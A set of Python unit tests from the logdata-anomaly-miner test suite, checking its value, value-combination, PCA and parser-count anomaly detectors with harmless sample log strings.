    first_seq_s1 = 'first/seq/s1'
    first_seq_d1 = 'first/seq/d1'
    string = " first/seq: b'25537 uid=2'\n " + first_seq_s1 + ": 25537 uid=\n " + first_seq_d1 + ": 2\n(b'25537 uid=', 2)"
    string2 = " (b'25537 uid=', 2)\n25537 uid=2"
    decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                               DecimalIntegerValueModelElement.PAD_TYPE_NONE)
    # First sequence: fixed prefix followed by an integer, matched under the 'first' path.
    match_context_sequence_me = MatchContext(b'25537 uid=2')
    seq = SequenceModelElement('seq', [fixed_dme, decimal_integer_value_me])
    match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me)
    # Second sequence: integer followed by a fixed suffix, matched under the 'second' path.
    match_context_sequence_me2 = MatchContext(b'25537 uid=2')
    seq2 = SequenceModelElement('seq2', [decimal_integer_value_me, fixed_dme2])
    match_element_sequence_me2 = seq2.get_match_element('second', match_context_sequence_me2)

    def test1_log_atom_not_known(self):
        """
        Process log lines that are not known to the detector, i.e. anomalies.
        The report written to the output stream is compared verbatim. With learn_mode off the very same atom must be
        reported again on a second run.
        """
        description = "Test1NewMatchPathValueComboDetector"
        detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [
            self.stream_printer_event_handler], 'Default', False, False, output_logline=False)
        self.analysis_context.register_component(detector, description)
        timestamp = time.time()
        when = datetime.fromtimestamp(timestamp).strftime(self.datetime_format_string)
        atom = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), timestamp, detector)
        expected = self.__expected_string % (when, detector.__class__.__name__, description, 1, self.string2)

        # first occurrence is reported
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), expected)
        self.reset_output_stream()

        # repeating should produce the same result
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), expected)
        self.reset_output_stream()

        # other MatchElement, matched by a second detector on the 'second/seq2' paths
        detector2 = NewMatchPathValueComboDetector(self.aminer_config, ['second/seq2/d1', 'second/seq2/s2'], [
            self.stream_printer_event_handler], 'Default', False, False, output_logline=False)
        self.analysis_context.register_component(detector2, description + "2")
        atom2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), timestamp,
                        detector2)
        self.assertTrue(detector2.receive_atom(atom2))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            when, detector.__class__.__name__, description + "2", 1, " (25537, b' uid=2')\n25537 uid=2"))

    def test2_log_atom_known(self):
        """
        Check the learn_mode: once a value combination has been seen with learn_mode on, processing the same
        MatchElement again must not trigger an event.
        """
        description = "Test2NewMatchPathValueComboDetector"
        detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [
            self.stream_printer_event_handler], 'Default', False, True, output_logline=False)
        self.analysis_context.register_component(detector, description)
        timestamp = time.time()
        when = datetime.fromtimestamp(timestamp).strftime(self.datetime_format_string)
        atom = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), timestamp, detector)

        # first occurrence is reported and learned
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(),
                         self.__expected_string % (when, detector.__class__.__name__, description, 1, self.string2))
        self.reset_output_stream()

        # repeating should NOT produce the same result
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), '')
        self.reset_output_stream()

        # other MatchElement, handled by a second detector without learn_mode
        detector2 = NewMatchPathValueComboDetector(self.aminer_config, ['second/seq2/d1', 'second/seq2/s2'], [
            self.stream_printer_event_handler], 'Default', False, False, output_logline=False)
        self.analysis_context.register_component(detector2, description + "2")
        atom2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), timestamp,
                        detector2)
        self.assertTrue(detector2.receive_atom(atom2))
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            when, detector.__class__.__name__, description + "2", 1, " (25537, b' uid=2')\n25537 uid=2"))

    def test3_log_atom_known_from_persisted_data(self):
        """Learned value combinations are persisted and a second detector instance must pick them up silently."""
        description = "Test3NewMatchPathValueComboDetector"
        detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [
            self.stream_printer_event_handler], 'Default', False, True, output_logline=False)
        self.analysis_context.register_component(detector, description)
        timestamp = time.time()
        when = datetime.fromtimestamp(timestamp).strftime(self.datetime_format_string)
        atom = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), timestamp, detector)
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(),
                         self.__expected_string % (when, detector.__class__.__name__, description, 1, self.string2))
        # write the learned combination, then build a fresh detector that reads it back
        detector.do_persist()
        self.reset_output_stream()
        reloaded_detector = NewMatchPathValueComboDetector(self.aminer_config, [
            self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False)
        self.analysis_context.register_component(reloaded_detector, description + "2")
        reloaded_atom = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), timestamp,
                                reloaded_detector)
        self.assertTrue(reloaded_detector.receive_atom(reloaded_atom))
        # the combination is already known from persistence, so nothing is reported
        self.assertEqual(self.output_stream.getvalue(), '')

    def test4_allowlist_event_with_known_and_unknown_paths(self):
        """Allowlist both an already seen and a never seen path and compare the returned messages."""
        description = "Test4NewMatchPathValueComboDetector"
        new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [
            self.stream_printer_event_handler], 'Default', False, True, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_combo_detector, description)
        timestamp = time.time()
        atom = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), timestamp,
                       new_match_path_value_combo_detector)
        new_match_path_value_combo_detector.receive_atom(atom)
        event_type = 'Analysis.%s' % new_match_path_value_combo_detector.__class__.__name__
        joined_paths = ", ".join(new_match_path_value_combo_detector.target_path_list)
        # known path, learn_mode still on
        self.assertEqual(
            new_match_path_value_combo_detector.allowlist_event(event_type, self.match_element_sequence_me.get_path(), None),
            'Allowlisted path(es) %s with %s.' % (joined_paths, self.match_element_sequence_me.get_path()))
        # unknown path, learn_mode switched off
        new_match_path_value_combo_detector.learn_mode = False
        self.assertEqual(
            new_match_path_value_combo_detector.allowlist_event(
                'Analysis.%s' % new_match_path_value_combo_detector.__class__.__name__, self.match_element_sequence_me2.get_path(), None),
            'Allowlisted path(es) %s with %s.'
# --- closing arguments of the last assertEqual in test4_allowlist_event_with_known_and_unknown_paths (statement starts above)
            % (
                ", ".join(new_match_path_value_combo_detector.target_path_list), self.match_element_sequence_me2.path))


if __name__ == "__main__":
    unittest.main()

# ---- tar member: logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathValueDetectorTest.py ----
import unittest
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase
from time import time
from datetime import datetime


class NewMatchPathValueDetectorTest(TestBase):
    """Unittests for the NewMatchPathValueDetector."""

    # format of one printed event: timestamp, detector class name, component description, line count, value dict
    __expected_string = '%s New value(s) detected\n%s: "%s" (%d lines)\n %s\n\n'
    analysis = 'Analysis.%s'
    datetime_format_string = '%Y-%m-%d %H:%M:%S'

    string = b'25537 uid=2'
    first_f1_s1 = 'first/f1/s1'
    # textual form of the value dict reported for first_f1_s1
    string2 = "{'first/f1/s1': '25537 uid=2'}"
    fixed_dme = FixedDataModelElement('s1', string)
    decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                               DecimalIntegerValueModelElement.PAD_TYPE_NONE)

    # f1 tries the fixed element first, so the whole string matches under first/f1/s1
    match_context_first_match_me = MatchContext(string)
    first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me])
    match_element_first_match_me = first_match_me.get_match_element('first', match_context_first_match_me)

    # f2 tries the integer element first, so only the leading number matches under second/f2/d1
    match_context_first_match_me2 = MatchContext(string)
    first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme])
    match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2)

    def test1_log_atom_not_known(self):
        """
        This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found.

        The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be
        repeatable on second run.
        """
        description = "Test1NewMatchPathValueDetector"
        # positional arguments after the handler list: persistence_id and learn_mode (order assumed from this file's usage;
        # confirm against NewMatchPathValueDetector)
        new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [
            self.stream_printer_event_handler], 'Default', False, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector, description)
        t = time()
        log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector)
        new_match_path_value_detector.receive_atom(log_atom_sequence_me)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__,
            description, 1, self.string2))
        self.reset_output_stream()

        # repeating should produce the same result, because nothing is learned with learn_mode False
        new_match_path_value_detector.receive_atom(log_atom_sequence_me)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__,
            description, 1, self.string2))
        self.reset_output_stream()

        # a second detector on the integer path reports the parsed integer, not the raw bytes
        new_match_path_value_detector2 = NewMatchPathValueDetector(self.aminer_config, ['second/f2/d1'], [
            self.stream_printer_event_handler], 'Default', False, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector2, description + "2")
        log_atom_sequence_me2 = LogAtom(b'25537', ParserMatch(self.match_element_first_match_me2), t, new_match_path_value_detector2)
        # other MatchElement
        new_match_path_value_detector2.receive_atom(log_atom_sequence_me2)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string),
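# --- closing arguments of the last assertEqual in test1_log_atom_not_known (statement starts above this chunk)
            new_match_path_value_detector.__class__.__name__, description + "2", 1, "{'second/f2/d1': 25537}"))

    def test2_log_atom_known(self):
        """
        This test case checks the functionality of the learn_mode.

        If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered.
        """
        description = "Test2NewMatchPathValueDetector"
        # positional arguments after the handler list: persistence_id and learn_mode (order assumed from this file's usage;
        # confirm against NewMatchPathValueDetector)
        new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [
            self.stream_printer_event_handler], 'Default', True, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector, description)
        t = time()
        log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector)
        new_match_path_value_detector.receive_atom(log_atom_sequence_me)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__,
            description, 1, self.string2))
        self.reset_output_stream()

        # repeating should NOT produce the same result: the value was learned on the first pass
        new_match_path_value_detector.receive_atom(log_atom_sequence_me)
        self.assertEqual(self.output_stream.getvalue(), '')
        self.reset_output_stream()

        # a detector on the other path has not seen its value yet and must still report it
        new_match_path_value_detector2 = NewMatchPathValueDetector(self.aminer_config, ['second/f2/d1'], [
            self.stream_printer_event_handler], 'Default', False, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector2, description + "2")
        log_atom_sequence_me2 = LogAtom(b'25537', ParserMatch(self.match_element_first_match_me2), t, new_match_path_value_detector2)
        # other MatchElement
        new_match_path_value_detector2.receive_atom(log_atom_sequence_me2)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__,
            description + "2", 1, "{'second/f2/d1': 25537}"))

    def test3log_atom_known_from_persisted_data(self):
        """
        The persisting and reading of permitted log lines should be checked with this test.

        A first detector learns the value and persists it; a second detector with the same persistence_id must then
        treat the same value as already known and emit nothing.
        """
        description = "Test3NewMatchPathValueDetector"
        new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [
            self.stream_printer_event_handler], 'Default', True, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector, description)
        t = time()
        log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector)
        # first sighting: one event is expected
        new_match_path_value_detector.receive_atom(log_atom_sequence_me)
        self.assertEqual(self.output_stream.getvalue(), self.__expected_string % (
            datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__,
            description, 1, self.string2))
        new_match_path_value_detector.do_persist()
        self.reset_output_stream()

        # a fresh detector with the same persistence_id must load the persisted value
        other_new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [
            self.stream_printer_event_handler], 'Default', True, output_logline=False)
        # fixed: the second registration previously re-registered the first detector under the new name, leaving
        # other_new_match_path_value_detector unregistered (compare NewMatchPathValueComboDetectorTest.test3)
        self.analysis_context.register_component(other_new_match_path_value_detector, description + "2")
        other_log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t,
                                           other_new_match_path_value_detector)
        other_new_match_path_value_detector.receive_atom(other_log_atom_fixed_dme)
        self.assertEqual(self.output_stream.getvalue(), '')

    def test4allowlist_event(self):
        """Test the allowlist_event method: allowlisting adds the value to known_values_set, and doing so twice is idempotent."""
        description = "Test4NewMatchPathValueDetector"
        new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [
            self.stream_printer_event_handler], 'Default', True, output_logline=False)
        self.analysis_context.register_component(new_match_path_value_detector, description)
        self.assertEqual(set(), new_match_path_value_detector.known_values_set)
        # an unknown value should be allowlisted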
# --- tail of test4allowlist_event (the method starts above this chunk)
        new_match_path_value_detector.allowlist_event(
            self.analysis % new_match_path_value_detector.__class__.__name__, self.fixed_dme.fixed_data.decode(), None)
        self.assertEqual({self.fixed_dme.fixed_data.decode()}, new_match_path_value_detector.known_values_set)
        # a known value should be allowlisted without duplicating it
        new_match_path_value_detector.allowlist_event(self.analysis % new_match_path_value_detector.__class__.__name__,
                                                     self.fixed_dme.fixed_data.decode(), None)
        self.assertEqual({self.fixed_dme.fixed_data.decode()}, new_match_path_value_detector.known_values_set)


if __name__ == "__main__":
    unittest.main()

# ---- tar member: logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/PCADetectorTest.py ----
import unittest
from aminer.analysis.PCADetector import PCADetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase


class TestHandler():
    """Dummy anomaly handler that only records the event data dicts it receives."""

    def __init__(self):
        self.anomalies = []

    # skipcq: PYL-W0613
    def receive_event(self, name, msg, ll, evdat, atom, obj):
        """Receive anomaly information; only evdat is kept, the other arguments are ignored."""
        self.anomalies.append(evdat)


class PCADetectorTest(TestBase):
    """Unittests for the PCADetector."""

    def test1_normal_pca_detection(self):
        """This test case checks the normal detection of value frequencies using PCA."""
        description = "Test1PCADetector"
        # Initialize detector for analyzing values in one path in time windows of 10 seconds
        # (the remaining positional parameters are not documented here — see PCADetector for their meaning)
        test_handler = TestHandler()
        pca_detector = PCADetector(self.aminer_config, ['/value'], [test_handler], 10, 2, 0.9, 3, 'Default', True, output_logline=False)
        self.analysis_context.register_component(pca_detector, description)

        # Prepare log atoms that represent different amounts of values a, b over time
        # Five time windows are used. The first three time windows are used for initializing
        # the count matrix. The fourth window is used to verify the anomaly score computation.
        # The fifth time window is only used to mark the end of the fourth time window.
        # The following log atoms are created:
        # window 1:
        #   value a: 2 times
        #   value b: 1 time
        # window 2:
        #   value a: 1 time
        #   value b: 1 time
        # window 3:
        #   value a: 1 time
        #   value b: 0 times
        # window 4:
        #   value a: 4 times
        #   value b: 1 time
        # window 5:
        #   value a: 1 time

        # Start of window 1:
        m_1 = MatchElement('/value', b'a', b'a', None)
        parser_match_1 = ParserMatch(m_1)
        log_atom_1 = LogAtom(b'a', parser_match_1, 1, None)
        m_2 = MatchElement('/value', b'b', b'b', None)
        parser_match_2 = ParserMatch(m_2)
        log_atom_2 = LogAtom(b'b', parser_match_2, 3, None)
        m_3 = MatchElement('/value', b'a', b'a', None)
        parser_match_3 = ParserMatch(m_3)
        log_atom_3 = LogAtom(b'a', parser_match_3, 7, None)
        # Start of window 2:
        m_4 = MatchElement('/value', b'a', b'a', None)
        parser_match_4 = ParserMatch(m_4)
        log_atom_4 = LogAtom(b'a', parser_match_4, 13, None)
        m_5 = MatchElement('/value', b'b', b'b', None)
        parser_match_5 = ParserMatch(m_5)
        log_atom_5 = LogAtom(b'b', parser_match_5, 15, None)
        # Start of window 3:
        m_6 = MatchElement('/value', b'a', b'a', None)
        parser_match_6 = ParserMatch(m_6)
        # NOTE(review): the raw atom data is b'b' while the match element value is b'a'; the count matrix asserted
        # below (window 3 = a:1, b:0) shows that the detector counts the match element value, not the raw data.
        log_atom_6 = LogAtom(b'b', parser_match_6, 27, None)
        # Start of window 4:
        m_7 = MatchElement('/value', b'a', b'a', None)
        parser_match_7 = ParserMatch(m_7)
        log_atom_7 = LogAtom(b'a', parser_match_7, 33, None)
        m_8 = MatchElement('/value', b'a', b'a', None)
        parser_match_8 = ParserMatch(m_8)
        log_atom_8 = LogAtom(b'a', parser_match_8, 34, None)
        m_9 = MatchElement('/value', b'a', b'a', None)
        parser_match_9 = ParserMatch(m_9)
        log_atom_9 = LogAtom(b'a', parser_match_9, 36, None)
        m_10 = MatchElement('/value', b'a', b'a', None)
        parser_match_10 = ParserMatch(m_10)
        log_atom_10 = LogAtom(b'a', parser_match_10, 37, None)
        m_11 = MatchElement('/value', b'b', b'b', None)
        parser_match_11 = ParserMatch(m_11)
        log_atom_11 = LogAtom(b'b', parser_match_11, 38, None)
        # Start of window 5:
        m_12 = MatchElement('/value', b'a', b'a', None)
        parser_match_12 = ParserMatch(m_12)
        log_atom_12 = LogAtom(b'a', parser_match_12, 45, None)

        # Forward log atoms to detector
        # Log atoms of windows 1 to 3 build up the count matrix
        # Input: log atoms of windows 1 to 3
        # Expected output: No anomalies reported
        pca_detector.receive_atom(log_atom_1)
        pca_detector.receive_atom(log_atom_2)
        pca_detector.receive_atom(log_atom_3)
        pca_detector.receive_atom(log_atom_4)
        pca_detector.receive_atom(log_atom_5)
        pca_detector.receive_atom(log_atom_6)
        self.assertFalse(test_handler.anomalies)

        # Log atoms of window 4 build the count vector for that window
        # Input: log atoms of window 4
        # Expected output: No anomalies reported
        pca_detector.receive_atom(log_atom_7)
        pca_detector.receive_atom(log_atom_8)
        pca_detector.receive_atom(log_atom_9)
        pca_detector.receive_atom(log_atom_10)
        pca_detector.receive_atom(log_atom_11)
        self.assertFalse(test_handler.anomalies)

        # At this point, the event count matrix contains the counts from the first three windows
        self.assertEqual(pca_detector.event_count_matrix, [{'/value': {'a': 2, 'b': 1}}, {'/value': {'a': 1, 'b': 1}}, {'/value': {'a': 1, 'b': 0}}])
        # The count vector contains the counts of the fourth window
        self.assertEqual(pca_detector.event_count_vector, {'/value': {'a': 4, 'b': 1}})

        # Log atom of window 5 triggers comparison of count vector from window 4 with PCA
        # Input: log atoms of window 5
        # Expected output: Anomaly reported on count vector of fourth window
        pca_detector.receive_atom(log_atom_12)
        self.assertEqual(test_handler.anomalies, [{'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': [['a', 'b']],
                                                                         'AffectedValueCounts': [[4, 1]], 'AnomalyScore': 9.0}}])

        # Event count matrix is shifted by 1 so that window 0 is removed and window 4 is appended
        self.assertEqual(pca_detector.event_count_matrix, [{'/value': {'a': 1, 'b': 1}}, {'/value': {'a': 1, 'b': 0}}, {'/value': {'a': 4, 'b': 1}}])


if __name__ == "__main__":
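# --- body of the ``if __name__ == "__main__":`` guard that closes PCADetectorTest.py (the guard line is above this chunk)
    unittest.main()

# ---- tar member: logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/ParserCountTest.py ----
from aminer.analysis.ParserCount import ParserCount, current_processed_lines_str, total_processed_lines_str
from aminer.input.LogAtom import LogAtom
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase
import time


class ParserCountTest(TestBase):
    """Unittests for the ParserCount."""

    match_context_m1 = MatchContext(b'First string')
    match_context_m2 = MatchContext(b' to match.')
    match_context_m3 = MatchContext(b'some completely other string to match.')
    match_context_seq = MatchContext(b'First string to match.')
    fixed_dme_m1 = FixedDataModelElement('m1', b'First string')
    fixed_dme_m2 = FixedDataModelElement('m2', b' to match.')
    # seq yields the paths fixed/seq, fixed/seq/m1 and fixed/seq/m2; m3 yields fixed/m3
    seq = SequenceModelElement('seq', [fixed_dme_m1, fixed_dme_m2])
    fixed_dme_m3 = FixedDataModelElement('m3', b'some completely other string to match.')
    match_element_m1 = fixed_dme_m1.get_match_element('fixed', match_context_m1)
    match_element_m2 = fixed_dme_m2.get_match_element('fixed', match_context_m2)
    match_element_m3 = fixed_dme_m3.get_match_element('fixed', match_context_m3)
    match_element_seq = seq.get_match_element('fixed', match_context_seq)

    def test1log_atom_not_in_path_list(self):
        """This unittest checks if no action happens, when no path in the match_dictionary matches a path."""
        parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2'], [self.stream_printer_event_handler])
        t = time.time()
        log_atom = LogAtom(self.fixed_dme_m3.fixed_data, ParserMatch(self.match_element_m3), t, parser_count)
        # fixed: copy the per-path count dicts as well. dict(count_dict) only copied the outer mapping, so the
        # snapshot shared the inner dicts with parser_count and the comparison below could never fail.
        old_count_dict = {path: dict(counts) for path, counts in parser_count.count_dict.items()}
        parser_count.receive_atom(log_atom)
        self.assertEqual(parser_count.count_dict,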
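# --- closing argument of the assertEqual in test1log_atom_not_in_path_list (statement starts above this chunk)
                         old_count_dict)

    def test2log_atom_matches_single_path(self):
        """This unittest tests the receive_atom method with a single path matching."""
        parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler])
        t = time.time()
        log_atom = LogAtom(self.fixed_dme_m3.fixed_data, ParserMatch(self.match_element_m3), t, parser_count)
        # fixed: copy the per-path count dicts as well. dict(count_dict) only copied the outer mapping, so the
        # expected values written below went straight into parser_count's own dicts and the assertion was vacuous.
        old_count_dict = {path: dict(counts) for path, counts in parser_count.count_dict.items()}
        old_count_dict['fixed/m3'][current_processed_lines_str] = 1
        old_count_dict['fixed/m3'][total_processed_lines_str] = 1
        parser_count.receive_atom(log_atom)
        self.assertEqual(parser_count.count_dict, old_count_dict)

    def test3log_atom_matches_multiple_paths(self):
        """This unittest tests the receive_atom method with multiple paths matching."""
        parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler])
        t = time.time()
        log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count)
        # fixed: independent snapshot of the inner dicts (see test2log_atom_matches_single_path)
        old_count_dict = {path: dict(counts) for path, counts in parser_count.count_dict.items()}
        # the sequence match touches the sequence path and both child paths; fixed/m3 stays untouched
        old_count_dict['fixed/seq'][current_processed_lines_str] = 1
        old_count_dict['fixed/seq'][total_processed_lines_str] = 1
        old_count_dict['fixed/seq/m1'][current_processed_lines_str] = 1
        old_count_dict['fixed/seq/m1'][total_processed_lines_str] = 1
        old_count_dict['fixed/seq/m2'][current_processed_lines_str] = 1
        old_count_dict['fixed/seq/m2'][total_processed_lines_str] = 1
        parser_count.receive_atom(log_atom)
        self.assertEqual(parser_count.count_dict, old_count_dict)

    def test4do_timer(self):
        """This unittest checks if the do_timer method works properly: it returns the seconds until the next report and sends a report when due."""
        parser_count = ParserCount(self.aminer_config, ['fixed/m3'], [self.stream_printer_event_handler], 600)
        t = time.time()
        # first call arms the timer for a full interval and prints nothing
        self.assertEqual(int(parser_count.do_timer(t + 100)), 600)
        self.assertEqual(self.output_stream.getvalue(), "")
        log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count)
        parser_count.receive_atom(log_atom)
        # same trigger time again: 500 seconds of the armed interval remain
        self.assertEqual(int(parser_count.do_timer(t + 100)), 500)
        self.assertEqual(self.output_stream.getvalue(), "")
        # past the deadline: a report is emitted and a full interval is returned again
        self.assertEqual(parser_count.do_timer(t + 601), 600)
        self.assertNotEqual(self.output_stream.getvalue(), "")
        self.reset_output_stream()

    def test5resetting(self):
        """This unittest tests the functionality of resetting the counts: a report resets the current counts but keeps the totals."""
        parser_count = ParserCount(self.aminer_config, ['fixed/seq', 'fixed/seq/m1', 'fixed/seq/m2', 'fixed/m3'], [self.stream_printer_event_handler], 600)
        parser_count.count_dict['fixed/seq'][current_processed_lines_str] = 5
        parser_count.count_dict['fixed/seq'][total_processed_lines_str] = 5
        parser_count.count_dict['fixed/seq/m1'][current_processed_lines_str] = 5
        parser_count.count_dict['fixed/seq/m1'][total_processed_lines_str] = 5
        parser_count.count_dict['fixed/seq/m2'][current_processed_lines_str] = 5
        parser_count.count_dict['fixed/seq/m2'][total_processed_lines_str] = 5
        parser_count.count_dict['fixed/m3'][current_processed_lines_str] = 17
        parser_count.count_dict['fixed/m3'][total_processed_lines_str] = 17
        # fixed: independent snapshot of the inner dicts. With the former shallow copy both assertions below compared
        # parser_count's dicts with themselves and passed regardless of what send_report() did.
        old_count_dict = {path: dict(counts) for path, counts in parser_count.count_dict.items()}
        parser_count.send_report()
        # NOTE(review): this keeps the original expectation that the first send_report() leaves the counts untouched;
        # it was never actually checked before this fix — confirm against ParserCount.send_report().
        self.assertEqual(parser_count.count_dict, old_count_dict)
        parser_count.send_report()
        old_count_dict['fixed/seq'][current_processed_lines_str] = 0
        old_count_dict['fixed/seq/m1'][current_processed_lines_str] = 0
        old_count_dict['fixed/seq/m2'][current_processed_lines_str] = 0
        old_count_dict['fixed/m3'][current_processed_lines_str] = 0
        self.assertEqual(parser_count.count_dict, old_count_dict)

    def test6receive_atom_without_target_paths(self):
        """This unittest tests the receive_atom method with multiple paths matching without having target_paths specified."""
        parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler])
        t = time.time()
        log_atom = LogAtom(self.match_context_seq.match_data, ParserMatch(self.match_element_seq), t, parser_count)
        # fixed: independent snapshot of the inner dicts (see test2log_atom_matches_single_path)
        old_count_dict = {path: dict(counts) for path, counts in parser_count.count_dict.items()}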
# --- tail of test6receive_atom_without_target_paths (the method starts above this chunk): without target paths the
# detector creates an entry for the matched sequence path on the fly.
        old_count_dict['fixed/seq'] = {current_processed_lines_str: 1, total_processed_lines_str: 1}
        parser_count.receive_atom(log_atom)
        self.assertEqual(parser_count.count_dict, old_count_dict)

    def test7initialize_errored_target_label_list(self):
        """
        Initialize the ParserCount class with errored target_label_list parameters and check if an error is raised.

        A label list without target paths, or one whose length differs from the target path list, must raise ValueError;
        matching lengths must be accepted.
        """
        self.assertRaises(ValueError, ParserCount, self.aminer_config, None, [self.stream_printer_event_handler], target_label_list=['p'])
        self.assertRaises(ValueError, ParserCount, self.aminer_config, ['path1', 'path2'], [self.stream_printer_event_handler], target_label_list=['p'])
        self.assertRaises(ValueError, ParserCount, self.aminer_config, ['path1'], [self.stream_printer_event_handler], target_label_list=['p1', 'p2'])
        ParserCount(self.aminer_config, ['path'], [self.stream_printer_event_handler], target_label_list=['p'])

# ---- tar member: logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/RulesTest.py ----
import unittest
# NOTE(review): _io is the private implementation module; the public spelling is ``from io import StringIO``
from _io import StringIO
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
from aminer.analysis.Rules import EventGenerationMatchAction, PathExistsMatchRule, ValueMatchRule, ValueListMatchRule, \
    ValueRangeMatchRule, StringRegexMatchRule, ModuloTimeMatchRule, ValueDependentModuloTimeMatchRule, IPv4InRFC1918MatchRule, \
    AndMatchRule, OrMatchRule, ValueDependentDelegatedMatchRule, NegationMatchRule
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.ParserMatch import ParserMatch
from aminer.input.LogAtom import LogAtom
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.analysis.AtomFilters import SubhandlerFilter
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
import re
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from time import time
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from unit.TestBase import TestBase
